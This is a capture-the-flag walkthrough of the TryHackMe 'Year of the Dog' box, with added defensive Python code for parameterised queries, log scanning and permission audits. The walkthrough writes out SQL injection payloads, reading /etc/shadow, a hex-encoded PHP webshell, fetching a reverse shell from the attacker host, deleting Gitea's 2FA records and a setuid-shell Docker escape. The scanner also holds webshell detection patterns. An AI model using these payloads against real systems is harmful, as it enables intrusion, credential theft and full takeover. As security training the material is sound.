Tryhackme Walkthrough : Year Of The Dog

Today we are going to solve another TryHackMe challenge, called “Year of the Dog” and designed by MuirlandOracle. So, without wasting too much time, let's start the war.

Level : Medium

Attacking Strategy

  • Enumeration
    • Rustscan
    • Sqli
  • Exploitation
  • Privilege Escalation

Enumeration

We start our war by scanning the target machine to identify the open services. Here we deploy our weapon called rustscan.

rustscan --ulimit 5001 10.10.138.129 -- -sC -sV -oN nmap 

From the result we find that port 22 (SSH) and port 80 (HTTP) are open.

Now it's time to get more information about the HTTP service, so we run Dirb and gobuster, but with no success. We therefore start manual testing and navigate to the site in a web browser.

Now here is the twist: every time we refresh the page we get a new queue number. After some time we make some changes to the cookie value and find that it is what drives the queue number. At this point we try SQL injection fuzzing and break the query by putting a ' at the end of the cookie value. If you are new to SQL injection you can try out the TryHackMe SQL lab.

Now we know that a SQL injection vulnerability is there, and we are going to start our manual approach.

  • First, find out the number of columns.
  • Identify the leaking column (the one whose value is reflected in the page).
  • Then dump out some information like the database name or version.
  • Dump out the tables from the database.
  • Dump out the columns.
  • At last, dump out the content.

Now let's dump out the total number of columns we have.

cfd844b81e6048155702a4d80d54a8ec' order by 5 --+

Now we know that there are fewer than 5 columns; in fact we have two columns.

cfd844b81e6048155702a4d80d54a8ec' order by 2 --+
(screenshot: number of columns)

After finding the column count we have to find the leaking column, which is the second one.

cfd844b81e6048155702a4d80d54a8ec' union all select 1,2 --+

Now it's time to dump out some information like the database name or version, etc.

cfd844b81e6048155702a4d80d54a8ec'  union select 1,database()  --+

The database name is “webapp”; let's dump out the tables.

cfd844b81e6048155702a4d80d54a8ec' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webapp' --+

The table we get from the database is “Queue”.

After getting information about the table, it's time to dump out the column information.

cfd844b81e6048155702a4d80d54a8ec' union select 1,group_concat(column_name) from information_schema.columns where table_name='queue' --+
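Everything in the enumeration above works because the cookie value is pasted straight into the SQL text. As an added illustration (this is not the challenge's code, which we never see; the table is a constructed SQLite stand-in that borrows only the column names UserId and QueueNum from the dump above), here is the queue lookup in the vulnerable form and in two hardened forms, run against the exact cookie values the writeup sends:

```python
import re
import sqlite3

# Constructed stand-in for the challenge's "queue" table. Only the column names
# (UserId, QueueNum) come from the writeup; the rows and values are made up.
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE queue (UserId TEXT PRIMARY KEY, QueueNum INTEGER);
INSERT INTO queue VALUES ('cfd844b81e6048155702a4d80d54a8ec', 17);
INSERT INTO queue VALUES ('0123456789abcdef0123456789abcdef', 42);
""")

# The page cookie is a 32-character hex string, so that is the only shape we accept.
COOKIE_RE = re.compile(r"[0-9a-f]{32}")


def queue_num_vulnerable(cookie):
    """Query built by string formatting: the cookie becomes part of the SQL text,
    so a quote in it changes the statement instead of being compared as data."""
    sql = f"SELECT UserId, QueueNum FROM queue WHERE UserId='{cookie}'"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", [r[1] for r in rows])


def queue_num_bound(cookie):
    """Same lookup with a bound parameter: whatever the cookie contains is compared
    as a value, so injected SQL simply matches no row."""
    rows = con.execute(
        "SELECT UserId, QueueNum FROM queue WHERE UserId=?", (cookie,)
    ).fetchall()
    return ("ok", [r[1] for r in rows])


def queue_num_safe(cookie):
    """Defence in depth: reject anything that is not a 32-hex-char id before the
    query runs, then bind it. Malformed cookies never reach the database at all."""
    if not COOKIE_RE.fullmatch(cookie):
        return ("rejected", None)
    return queue_num_bound(cookie)


if __name__ == "__main__":
    # The same cookie values the writeup sends, run against both versions.
    for c in ["cfd844b81e6048155702a4d80d54a8ec",
              "cfd844b81e6048155702a4d80d54a8ec'",
              "cfd844b81e6048155702a4d80d54a8ec' order by 5 --+",
              "cfd844b81e6048155702a4d80d54a8ec' order by 2 --+",
              "cfd844b81e6048155702a4d80d54a8ec' union all select 1,2 --+"]:
        print(f"{c!r}\n  vulnerable: {queue_num_vulnerable(c)}\n  safe: {queue_num_safe(c)}")
```

The vulnerable function reproduces what the writeup observes: the lone quote is an error, `order by 5` errors while `order by 2` does not (that is how the column count leaks), and the union payload appends an attacker row. With the bound parameter the same strings are just unmatched ids, and the regex check in front rejects them before a query is even issued.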

The columns we get are UserId and QueueNum. At this point we haven't found any user information like names, password hashes, etc. After some time we try to read files with the load_file function and succeed: we can read system files through the SQL injection vulnerability.

cfd844b81e6048155702a4d80d54a8ec'union all select 1,load_file('/etc/shadow')--+

After reading up on the internet we figured out that we can also write files on the server. We prepare a PHP payload so that we can get command execution, but before that we write a simple HTML file to confirm that the technique works, and as shown in the figure it works fine.

cfd844b81e6048155702a4d80d54a8ec' union all select 1,'hey checking wrtting' into outfile '/var/www/html/test.html' --+

Now let's put our payload:

cfd844b81e6048155702a4d80d54a8ec' union select 1,'<?php system($_GET["cmd"]) ?>' into outfile '/var/www/html/rce.php' --+

But this gets detected. When we convert the payload string into hex and write that instead, it bypasses the filter.

cfd844b81e6048155702a4d80d54a8ec' union select 1,unhex('3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E') into outfile  '/var/www/html/rce1.php' --+

curl http://10.10.138.129/rce1.php?cmd=id

Our payload is successfully implanted on the server, and now we can execute system-level commands with it and get our netcat shell.
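From the defender's side, the filter the author hit was only looking at the literal string, which is why hex encoding walked past it: a detection rule has to decode what the database will decode. Two other things are worth checking on a MySQL host after reading this section: the application account holds the FILE privilege, and secure_file_priv is not confining LOAD_FILE/INTO OUTFILE to a directory (an empty value disables both), while the web root is writable by the mysql user, which is what lets rce1.php land. The following is an added example, not part of the writeup: a small log scanner that runs over constructed access-log lines (cookie logged as the last field, which is an assumption about the log format) and flags the file primitives used above, hex-encoded webshell bodies, and later requests to a file that an INTO OUTFILE aimed at the web root. WEB_ROOT is an assumed DocumentRoot.

```python
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumption: the monitored site's DocumentRoot

SQL_FILE_PRIMITIVES = re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)
OUTFILE_TARGET = re.compile(r"\binto\s+(?:out|dump)file\s*'([^']+)'", re.I)
HEX_LITERAL = re.compile(r"(?:\bunhex\s*\(\s*'|\b0x)([0-9a-fA-F]{8,})")
WEBSHELL_MARKERS = re.compile(r"<\?php|\b(?:system|passthru|shell_exec|exec)\s*\(", re.I)
REQUEST_PATH = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')

# Constructed sample log lines (combined format plus the cookie as a trailing field).
# The cookie payloads mirror the writeup; IPs, timestamps and sizes are invented.
SAMPLE_LOG = [
    '10.11.3.131 - - [01/Jan/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0" '
    '"id=cfd844b81e6048155702a4d80d54a8ec"',
    '10.11.3.131 - - [01/Jan/2021:10:00:01 +0000] "GET / HTTP/1.1" 500 0 "-" "Mozilla/5.0" '
    '"id=cfd844b81e6048155702a4d80d54a8ec\' union all select 1,load_file(\'/etc/shadow\')--+"',
    '10.11.3.131 - - [01/Jan/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0" '
    '"id=cfd844b81e6048155702a4d80d54a8ec\' union select 1,unhex(\'3C3F7068702073797374656D28245F4745545B22636D64225D29203F3E\') '
    'into outfile \'/var/www/html/rce1.php\' --+"',
    '10.11.3.131 - - [01/Jan/2021:10:00:03 +0000] "GET /rce1.php?cmd=id HTTP/1.1" 200 80 "-" "curl/7.68.0" "-"',
]


def expand_hex(text):
    """Append the decoded form of every unhex('...') / 0x... literal, so the rules
    see the same bytes MySQL would produce from them."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        h = m.group(1)
        if len(h) % 2 == 0:
            decoded.append(bytes.fromhex(h).decode("utf-8", "replace"))
    return text + " " + " ".join(decoded)


def inspect_line(line, written):
    """Return the rule names that fire for one log line. `written` carries URL paths
    that an earlier INTO OUTFILE aimed at the web root, so later hits on them are flagged."""
    text = unquote(line)
    expanded = expand_hex(text)
    hits = []
    if SQL_FILE_PRIMITIVES.search(expanded):
        hits.append("sql-file-primitive")
    if WEBSHELL_MARKERS.search(expanded):
        hits.append("php-webshell-body")
        if HEX_LITERAL.search(text) and not WEBSHELL_MARKERS.search(text):
            hits.append("hex-encoded-payload")  # markers only visible after decoding
    for target in OUTFILE_TARGET.findall(expanded):
        if target.startswith(WEB_ROOT + "/"):
            written.add(target[len(WEB_ROOT):])
            hits.append("outfile-into-webroot")
    m = REQUEST_PATH.search(text)
    if m and m.group(1).split("?", 1)[0] in written:
        hits.append("request-to-db-written-file")
    return hits


def scan_log(lines):
    """Run inspect_line over a whole log; returns {line_number: [rules]} for lines that fired."""
    written = set()
    findings = {}
    for n, line in enumerate(lines, 1):
        hits = inspect_line(line, written)
        if hits:
            findings[n] = hits
    return findings


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

The stateful part matters: the `cmd=id` request on its own looks like any other GET, but because the scanner remembers that the database was told to write `/var/www/html/rce1.php`, the first request to `/rce1.php` is reported as access to a file the database created. Logging the cookie header is the precondition; without it the whole injection is invisible in the access log.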

Let's put the reverse shell on the server by hosting it locally, then fetch it onto the server and execute it with our payload.

10.10.138.129/rce1.php?cmd=wget http://10.11.3.131:8000/shell1.sh

Shell successfully planted; let's execute it using curl or the browser.

curl http://10.10.138.129/rce1.php?cmd=bash%20shell1.sh

Privilege Escalation

Here we get our netcat session. Now it's time to move up to the root user, so we have to do more enumeration, and we find some files in the “dylan” user's home directory: one is the user flag and another is the work_analysis file, in which we get that user's password.

cd /home/dylan
ls
cat work_analysis | grep dylan 

We know the user and password, which gives us an SSH login directly to the server.

ssh dylan@10.10.138.129
(the password you will get while solving it)

After login we check the running services and the socket connections at the internal level; we find a service listening only locally, and we forward it to our system with local SSH port forwarding.

After the port forwarding we access that service at the local address on port 3000: it is a Gitea instance, version 1.13.0.

Here the twist occurs again: when we log in with dylan's credentials we are asked for two-factor authentication. The application's files are also located under “/gitea”, and in that folder we see the database file, which we can easily modify using Python.

cd /gitea/gitea
python3
import sqlite3
con = sqlite3.connect('gitea.db')
cursor = con.cursor()
# list the tables so we can see where the 2FA records live
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
print(cursor.fetchall())
# drop the second-factor enrolment, then commit so the change is written to disk
cursor.execute("delete from two_factor")
con.commit()

After the commit we refresh the application, log in, and easily bypass the two-factor authentication; now we are in the application, which looks like a Git hosting service.

I have solved many labs in which Git is used, so with that experience I simply go to the settings and deploy my reverse shell in the Git hooks.

Here we put a simple reverse shell, update the hook, and now it's time to trigger it by cloning the repo, making some changes, committing and pushing.

git clone http://localhost:3000/Dylan/Test-Repo.git
cd Test-Repo
echo "hey new changes pentestsky" >README.md
git add README.md
git commit -m "pentestsky new changes"
git push

On the other side we get a session, but this session is inside a Docker container. The home directory of the git user is the same filesystem where the application files are located, and we can confirm it by listing the items.

This is an open and shut case: we first deploy the bash binary with the help of the Docker container as the root user, then go back to the dylan account and run that bash binary, which we already modified using the Docker root user.
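Both the two-factor bypass (a login user could write gitea.db) and this last step (a path shared between a container root and a host user, so a setuid binary dropped from one side is runnable from the other) are filesystem permission problems, and both are cheap to find before an attacker does. As an added example that is not part of the writeup, here is a small audit that walks a directory tree and reports files that carry the setuid/setgid bits or are writable by group or other; it builds a constructed temp tree imitating the two situations (a world-writable database file and a setuid copy of a shell; the contents are placeholders, not a real sqlite file or a real bash binary) and runs over it:

```python
import os
import shutil
import stat
import tempfile


def audit_tree(root):
    """Walk `root` and return {relative_path: [issues]} for regular files that are
    setuid, setgid, or writable by group/other. Symlinks are reported by their own
    mode and never followed, so a link cannot point the scan elsewhere."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: nothing to report
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = st.st_mode
            issues = []
            if mode & stat.S_ISUID:
                issues.append("setuid")
            if mode & stat.S_ISGID:
                issues.append("setgid")
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                issues.append("group/other-writable")
            if issues:
                findings[os.path.relpath(path, root)] = issues
    return findings


def build_demo_tree():
    """Constructed layout imitating the writeup's host: an application database that
    any local user can write, a setuid shell copy, and one well-permissioned file.
    Returns the temporary root directory (caller removes it)."""
    root = tempfile.mkdtemp(prefix="yotd-audit-")
    os.makedirs(os.path.join(root, "gitea", "gitea"))

    db = os.path.join(root, "gitea", "gitea", "gitea.db")
    with open(db, "wb") as f:
        f.write(b"constructed placeholder, not a real sqlite database")
    os.chmod(db, 0o666)  # writable by everyone: the condition that let the 2FA rows be deleted

    sh = os.path.join(root, "gitea", "bash")
    with open(sh, "wb") as f:
        f.write(b"#!/bin/sh\n")  # placeholder, not a real bash binary
    os.chmod(sh, 0o4755)  # setuid bit set: what a container root can leave on a shared path

    ok = os.path.join(root, "gitea", "README")
    with open(ok, "wb") as f:
        f.write(b"fine")
    os.chmod(ok, 0o644)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    try:
        for path, issues in sorted(audit_tree(root).items()):
            print(f"{path}: {', '.join(issues)}")
    finally:
        shutil.rmtree(root)
```

In practice you would point audit_tree at the application's data directory and at every host path that is bind-mounted into a container; the setuid check is also a good argument for mounting such volumes with nosuid, which makes the bit inert even if a file carries it.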

(screenshots: dylan account, Docker account, root account)

Finally we get root.

Contact : [email protected] or DM us on twitter.

Thank you
